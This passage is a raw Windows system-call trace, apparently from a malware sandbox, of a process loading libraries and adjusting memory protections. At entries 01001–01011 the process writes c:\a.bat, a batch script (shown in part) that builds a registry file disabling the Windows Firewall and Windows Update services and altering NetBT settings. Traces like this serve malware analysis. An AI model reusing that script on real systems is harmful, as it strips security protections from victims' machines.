(0x77c01078), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00853 896 NtProtectVirtualMemory (-1, (0x77c01098), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00854 896 NtProtectVirtualMemory (-1, (0x77c01098), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00855 896 NtProtectVirtualMemory (-1, (0x77c0109c), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00856 896 NtProtectVirtualMemory (-1, (0x77c0109c), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00857 896 NtProtectVirtualMemory (-1, (0x77c010b0), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00858 896 NtProtectVirtualMemory (-1, (0x77c010b0), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00859 896 NtProtectVirtualMemory (-1, (0x77c010e4), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00860 896 NtProtectVirtualMemory (-1, (0x77c010e4), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00861 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\kernel32.dll"}, 1242116, ... ) }, 1242116, ... ) == 0x0 00862 896 NtProtectVirtualMemory (-1, (0x424024), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00863 896 NtProtectVirtualMemory (-1, (0x424024), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00864 896 NtProtectVirtualMemory (-1, (0x424074), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00865 896 NtProtectVirtualMemory (-1, (0x424074), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00866 896 NtProtectVirtualMemory (-1, (0x424078), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00867 896 NtProtectVirtualMemory (-1, (0x424078), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00868 896 NtProtectVirtualMemory (-1, (0x424084), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00869 896 NtProtectVirtualMemory (-1, (0x424084), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00870 896 NtProtectVirtualMemory (-1, (0x424088), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00871 896 NtProtectVirtualMemory (-1, (0x424088), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00872 896 NtProtectVirtualMemory (-1, (0x42409c), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00873 896 NtProtectVirtualMemory (-1, (0x42409c), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00874 896 NtProtectVirtualMemory (-1, (0x4240a0), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00875 896 NtProtectVirtualMemory (-1, (0x4240a0), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00876 896 NtProtectVirtualMemory (-1, (0x4240a4), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00877 896 NtProtectVirtualMemory (-1, (0x4240a4), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00878 896 NtProtectVirtualMemory (-1, (0x4240b0), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00879 896 NtProtectVirtualMemory (-1, (0x4240b0), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00880 896 NtProtectVirtualMemory (-1, (0x4240b4), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00881 896 NtProtectVirtualMemory (-1, (0x4240b4), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00882 896 NtProtectVirtualMemory (-1, (0x4240b8), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00883 896 NtProtectVirtualMemory (-1, (0x4240b8), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00884 896 NtProtectVirtualMemory (-1, (0x4240cc), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00885 896 NtProtectVirtualMemory (-1, (0x4240cc), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00886 896 NtProtectVirtualMemory (-1, (0x4240d4), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00887 896 NtProtectVirtualMemory (-1, (0x4240d4), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00888 896 NtProtectVirtualMemory (-1, (0x4240d8), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00889 896 NtProtectVirtualMemory (-1, (0x4240d8), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00890 896 NtProtectVirtualMemory (-1, (0x4240f8), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00891 896 NtProtectVirtualMemory (-1, (0x4240f8), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00892 896 NtProtectVirtualMemory (-1, (0x424108), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00893 896 NtProtectVirtualMemory (-1, (0x424108), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00894 896 NtProtectVirtualMemory (-1, (0x42410c), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00895 896 NtProtectVirtualMemory (-1, (0x42410c), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00896 896 NtProtectVirtualMemory (-1, (0x424110), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00897 896 NtProtectVirtualMemory (-1, (0x424110), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00898 896 NtProtectVirtualMemory (-1, (0x424150), 4, 4, ... (0x424000), 4096, 64, ) == 0x0 00899 896 NtProtectVirtualMemory (-1, (0x424150), 4, 64, ... (0x424000), 4096, 4, ) == 0x0 00900 896 NtProtectVirtualMemory (-1, (0x77f1102c), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00901 896 NtProtectVirtualMemory (-1, (0x77f1102c), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00902 896 NtProtectVirtualMemory (-1, (0x77f11078), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00903 896 NtProtectVirtualMemory (-1, (0x77f11078), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00904 896 NtProtectVirtualMemory (-1, (0x77f11084), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00905 896 NtProtectVirtualMemory (-1, (0x77f11084), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00906 896 NtProtectVirtualMemory (-1, (0x77f1109c), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00907 896 NtProtectVirtualMemory (-1, (0x77f1109c), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00908 896 NtProtectVirtualMemory (-1, (0x77f110a4), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00909 896 NtProtectVirtualMemory (-1, (0x77f110a4), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00910 896 NtProtectVirtualMemory (-1, (0x77f110a8), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00911 896 NtProtectVirtualMemory (-1, (0x77f110a8), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00912 896 NtProtectVirtualMemory (-1, (0x77f110ac), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00913 896 NtProtectVirtualMemory (-1, (0x77f110ac), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00914 896 NtProtectVirtualMemory (-1, (0x77f110bc), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00915 896 NtProtectVirtualMemory (-1, (0x77f110bc), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00916 896 NtProtectVirtualMemory (-1, (0x77f110c0), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00917 896 NtProtectVirtualMemory (-1, (0x77f110c0), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00918 896 NtProtectVirtualMemory (-1, (0x77f110c4), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00919 896 NtProtectVirtualMemory (-1, (0x77f110c4), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00920 896 NtProtectVirtualMemory (-1, (0x77f110e4), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00921 896 NtProtectVirtualMemory (-1, (0x77f110e4), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00922 896 NtProtectVirtualMemory (-1, (0x77f110f0), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00923 896 NtProtectVirtualMemory (-1, (0x77f110f0), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00924 896 NtProtectVirtualMemory (-1, (0x77f110f8), 4, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00925 896 NtProtectVirtualMemory (-1, (0x77f110f8), 4, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00926 896 NtProtectVirtualMemory (-1, (0x7e4111f0), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00927 896 NtProtectVirtualMemory (-1, (0x7e4111f0), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00928 896 NtProtectVirtualMemory (-1, (0x7e411200), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00929 896 NtProtectVirtualMemory (-1, (0x7e411200), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00930 896 NtProtectVirtualMemory (-1, (0x7e411208), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00931 896 NtProtectVirtualMemory (-1, (0x7e411208), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00932 896 NtProtectVirtualMemory (-1, (0x7e41124c), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00933 896 NtProtectVirtualMemory (-1, (0x7e41124c), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00934 896 NtProtectVirtualMemory (-1, (0x7e411250), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00935 896 NtProtectVirtualMemory (-1, (0x7e411250), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00936 896 NtProtectVirtualMemory (-1, (0x7e411254), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00937 896 NtProtectVirtualMemory (-1, (0x7e411254), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00938 896 NtProtectVirtualMemory (-1, (0x7e411258), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00939 896 NtProtectVirtualMemory (-1, (0x7e411258), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00940 896 NtProtectVirtualMemory (-1, (0x7e41125c), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00941 896 NtProtectVirtualMemory (-1, (0x7e41125c), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00942 896 NtProtectVirtualMemory (-1, (0x7e411260), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00943 896 NtProtectVirtualMemory (-1, (0x7e411260), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00944 896 NtProtectVirtualMemory (-1, (0x7e4112ac), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00945 896 NtProtectVirtualMemory (-1, (0x7e4112ac), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00946 896 NtProtectVirtualMemory (-1, (0x7e4112b0), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00947 896 NtProtectVirtualMemory (-1, (0x7e4112b0), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00948 896 NtProtectVirtualMemory (-1, (0x7e4112b4), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00949 896 NtProtectVirtualMemory (-1, (0x7e4112b4), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00950 896 NtProtectVirtualMemory (-1, (0x7e4112e8), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00951 896 NtProtectVirtualMemory (-1, (0x7e4112e8), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00952 896 NtProtectVirtualMemory (-1, (0x7e4112ec), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00953 896 NtProtectVirtualMemory (-1, (0x7e4112ec), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00954 896 NtProtectVirtualMemory (-1, (0x7e4112f8), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00955 896 NtProtectVirtualMemory (-1, (0x7e4112f8), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00956 896 NtProtectVirtualMemory (-1, (0x7e411308), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00957 896 NtProtectVirtualMemory (-1, (0x7e411308), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00958 896 NtProtectVirtualMemory (-1, (0x7e41133c), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00959 896 NtProtectVirtualMemory (-1, (0x7e41133c), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00960 896 NtProtectVirtualMemory (-1, (0x7e411340), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00961 896 NtProtectVirtualMemory (-1, (0x7e411340), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00962 896 NtProtectVirtualMemory (-1, (0x7e411344), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00963 896 NtProtectVirtualMemory (-1, (0x7e411344), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00964 896 NtProtectVirtualMemory (-1, (0x7e41134c), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00965 896 NtProtectVirtualMemory (-1, (0x7e41134c), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00966 896 NtProtectVirtualMemory (-1, (0x7e411370), 4, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00967 896 NtProtectVirtualMemory (-1, (0x7e411370), 4, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00968 896 NtProtectVirtualMemory (-1, (0x76391154), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00969 896 NtProtectVirtualMemory (-1, (0x76391154), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00970 896 NtProtectVirtualMemory (-1, (0x76391164), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00971 896 NtProtectVirtualMemory (-1, (0x76391164), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00972 896 NtProtectVirtualMemory (-1, (0x76391188), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00973 896 NtProtectVirtualMemory (-1, (0x76391188), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00974 896 NtProtectVirtualMemory (-1, (0x7639118c), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00975 896 NtProtectVirtualMemory (-1, (0x7639118c), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00976 896 NtProtectVirtualMemory (-1, (0x76391190), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00977 896 NtProtectVirtualMemory (-1, (0x76391190), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00978 896 NtProtectVirtualMemory (-1, (0x76391194), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00979 896 NtProtectVirtualMemory (-1, (0x76391194), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00980 896 NtProtectVirtualMemory (-1, (0x763911ec), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00981 896 NtProtectVirtualMemory (-1, (0x763911ec), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00982 896 NtProtectVirtualMemory (-1, (0x763911f0), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00983 896 NtProtectVirtualMemory (-1, (0x763911f0), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00984 896 NtProtectVirtualMemory (-1, (0x76391204), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00985 896 NtProtectVirtualMemory (-1, (0x76391204), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00986 896 NtProtectVirtualMemory (-1, (0x7639120c), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00987 896 NtProtectVirtualMemory (-1, (0x7639120c), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00988 896 NtProtectVirtualMemory (-1, (0x76391210), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00989 896 NtProtectVirtualMemory (-1, (0x76391210), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00990 896 NtProtectVirtualMemory (-1, (0x76391214), 4, 4, ... (0x76391000), 4096, 32, ) == 0x0 00991 896 NtProtectVirtualMemory (-1, (0x76391214), 4, 32, ... (0x76391000), 4096, 4, ) == 0x0 00992 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00993 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 11272192, 65536, ) == 0x0 00994 896 NtAllocateVirtualMemory (-1, 11272192, 0, 4096, 4096, 4, ... 11272192, 4096, ) == 0x0 00995 896 NtAllocateVirtualMemory (-1, 11276288, 0, 4096, 4096, 4, ... 11276288, 4096, ) == 0x0 00996 896 NtAllocateVirtualMemory (-1, 11280384, 0, 4096, 4096, 4, ... 11280384, 4096, ) == 0x0 00997 896 NtQueryVirtualMemory (-1, 0x4209bf, Basic, 28, ... {BaseAddress=0x420000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xfc000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 00998 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 00999 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 01000 896 NtQueryVirtualMemory (-1, 0x77c2807c, Basic, 28, ... {BaseAddress=0x77c28000,AllocationBase=0x77c10000,AllocationProtect=0x80,RegionSize=0x35000,State=0x1000,Protect=0x20,Type=0x1000000,}, 28, ) == 0x0 01001 896 NtCreateFile (0x40100080, {24, 0, 0x40, 0, 1235836, (0x40100080, {24, 0, 0x40, 0, 1235836, "\??\c:\a.bat"}, 0x0, 0, 0, 5, 96, 0, 0, ... }, 0x0, 0, 0, 5, 96, 0, 0, ... 01002 896 NtClose (-2147481368, ... ) == 0x0 01001 896 NtCreateFile ... 52, {status=0x0, info=2}, ) == 0x0 01003 896 NtWriteFile (52, 0, 0, 0, (52, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... TransportBindName (52, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... (52, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... Start (52, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... Start (52, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... , 5894, 0x0, 0, ... 01004 896 NtContinue (-135750188, 0, ... 01003 896 NtWriteFile ... {status=0x0, info=5894}, ) == 0x0 01005 896 NtClose (52, ... ) == 0x0 01006 896 NtQueryInformationJobObject (0, BasicUIRestrictions, 4, ... ) == STATUS_ACCESS_DENIED 01007 896 NtAllocateVirtualMemory (-1, 1224704, 0, 4096, 4096, 260, ... 1224704, 4096, ) == 0x0 01008 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\c:\a.bat"}, 1232232, ... ) }, 1232232, ... ) == 0x0 01009 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\c:\a.bat"}, 1232968, ... ) }, 1232968, ... ) == 0x0 01010 896 NtOpenFile (0x1000a1, {24, 0, 0x40, 0, 0, (0x1000a1, {24, 0, 0x40, 0, 0, "\??\c:\a.bat"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0 01011 896 NtCreateSection (0xf001f, 0x0, 0x0, 16, 16777216, 52, ... ) == STATUS_INVALID_IMAGE_NOT_MZ 01012 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility"}, ... 56, ) }, ... 56, ) == 0x0 01013 896 NtQueryValueKey (56, (56, "DisableAppCompat", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01014 896 NtClose (56, ... ) == 0x0 01015 896 NtQueryVolumeInformationFile (52, 1232244, 8, Device, ... {status=0x0, info=8}, ) == 0x0 01016 896 NtOpenMutant (0x120001, {24, 48, 0x0, 0, 0, (0x120001, {24, 48, 0x0, 0, 0, "ShimCacheMutex"}, ... 56, ) }, ... 56, ) == 0x0 01017 896 NtWaitForSingleObject (56, 0, {-1000000, -1}, ... ) == 0x0 01018 896 NtOpenSection (0x2, {24, 48, 0x0, 0, 0, (0x2, {24, 48, 0x0, 0, 0, "ShimSharedMemory"}, ... 60, ) }, ... 60, ) == 0x0 01019 896 NtMapViewOfSection (60, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0xad0000), {0, 0}, 57344, ) == 0x0 01020 896 NtReleaseMutant (56, ... 0x0, ) == 0x0 01021 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 1230176, ... ) }, 1230176, ... ) == 0x0 01022 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 5, 96, ... 64, {status=0x0, info=1}, ) }, 5, 96, ... 64, {status=0x0, info=1}, ) == 0x0 01023 896 NtCreateSection (0xe, 0x0, 0x0, 16, 134217728, 64, ... 68, ) == 0x0 01024 896 NtClose (64, ... ) == 0x0 01025 896 NtMapViewOfSection (68, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xae0000), 0x0, 126976, ) == 0x0 01026 896 NtClose (68, ... ) == 0x0 01027 896 NtUnmapViewOfSection (-1, 0xae0000, ... ) == 0x0 01028 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 1230484, ... ) }, 1230484, ... ) == 0x0 01029 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 5, 96, ... 68, {status=0x0, info=1}, ) }, 5, 96, ... 68, {status=0x0, info=1}, ) == 0x0 01030 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 68, ... 64, ) == 0x0 01031 896 NtQuerySection (64, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 01032 896 NtClose (68, ... ) == 0x0 01033 896 NtMapViewOfSection (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77b40000), 0x0, 139264, ) == 0x0 01034 896 NtClose (64, ... ) == 0x0 01035 896 NtProtectVirtualMemory (-1, (0x77b41000), 524, 4, ... (0x77b41000), 4096, 32, ) == 0x0 01036 896 NtProtectVirtualMemory (-1, (0x77b41000), 4096, 32, ... (0x77b41000), 4096, 4, ) == 0x0 01037 896 NtFlushInstructionCache (-1, 2008289280, 524, ... ) == 0x0 01038 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Apphelp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01039 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 0, (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\sysmain.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... 64, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 64, {status=0x0, info=1}, ) == 0x0 01040 896 NtQueryInformationFile (64, 1230500, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 01041 896 NtCreateSection (0x4, 0x0, 0x0, 2, 134217728, 64, ... 68, ) == 0x0 01042 896 NtMapViewOfSection (68, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0xae0000), 0x0, 1191936, ) == 0x0 01043 896 NtQueryInformationFile (64, 1230600, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 01044 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 0, (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\systest.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... ) }, 0x0, 128, 1, 1, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01045 896 NtAllocateVirtualMemory (-1, 1220608, 0, 4096, 4096, 260, ... 1220608, 4096, ) == 0x0 01046 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 01047 896 NtQueryInformationProcess (-1, Wow64, 4, ... {process info, class 26, size 4}, 0x0, ) == 0x0 01048 896 NtOpenKey (0x101, {24, 0, 0x40, 0, 0, (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\WPA\TabletPC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01049 896 NtOpenKey (0x101, {24, 0, 0x40, 0, 0, (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\SYSTEM\WPA\MediaCenter"}, ... 72, ) }, ... 72, ) == 0x0 01050 896 NtQueryValueKey (72, (72, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 256, ... TitleIdx=0, Type=4, Data= (72, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01051 896 NtClose (72, ... ) == 0x0 01052 896 NtCreateFile (0x120116, {24, 0, 0x40, 0, 0, (0x120116, {24, 0, 0x40, 0, 0, "\Device\NamedPipe\ShimViewer"}, 0x0, 128, 